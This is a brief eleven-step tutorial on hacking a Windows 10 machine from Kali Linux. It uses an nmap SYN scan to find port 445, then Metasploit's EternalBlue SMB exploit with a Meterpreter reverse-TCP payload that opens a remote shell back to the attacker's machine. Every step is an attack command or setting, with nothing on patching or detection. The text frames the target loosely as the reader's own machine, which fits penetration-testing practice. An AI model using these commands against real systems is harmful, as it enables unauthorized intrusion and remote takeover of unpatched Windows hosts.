Step 1: Boot up your Kali Linux machine. If you don’t have Kali, you can download and install it from here.

Step 2: Find out the IP address of your Windows 10 machine. You can do this by opening up the Command Prompt and typing in ipconfig. The IP address will be under the heading “IPv4 Address”.

Step 3: In Kali, open up a terminal window and type in nmap -sS -Pn {ip address of Windows 10 machine}. This will scan the machine for open ports.

Step 4: Once the scan is complete, look for port 445. This is the port that SMB runs on and is often left open on Windows machines.

Step 5: To exploit the machine, we will be using a tool called Metasploit. In the terminal, type in msfconsole to open up the Metasploit console.

Step 6: In the Metasploit console, type in use exploit/windows/smb/ms17_010_eternalblue. This will load the exploit into Metasploit.

Step 7: Now we need to set some parameters for the exploit. Type in set RHOSTS {ip address of Windows 10 machine}. This tells Metasploit where to find the machine we want to exploit.

Step 8: Type in set PAYLOAD windows/meterpreter/reverse_tcp. This tells Metasploit what payload to use. The meterpreter payload gives us a reverse shell on the Windows machine.

Step 9: Type in set LHOST {ip address of Kali machine}. This tells Metasploit where to send the reverse shell.

Step 10: Type in exploit to run the exploit.

Step 11: If everything went as planned, you should now have a meterpreter session open on the Windows machine. Congratulations, you have successfully hacked a Windows 10 machine!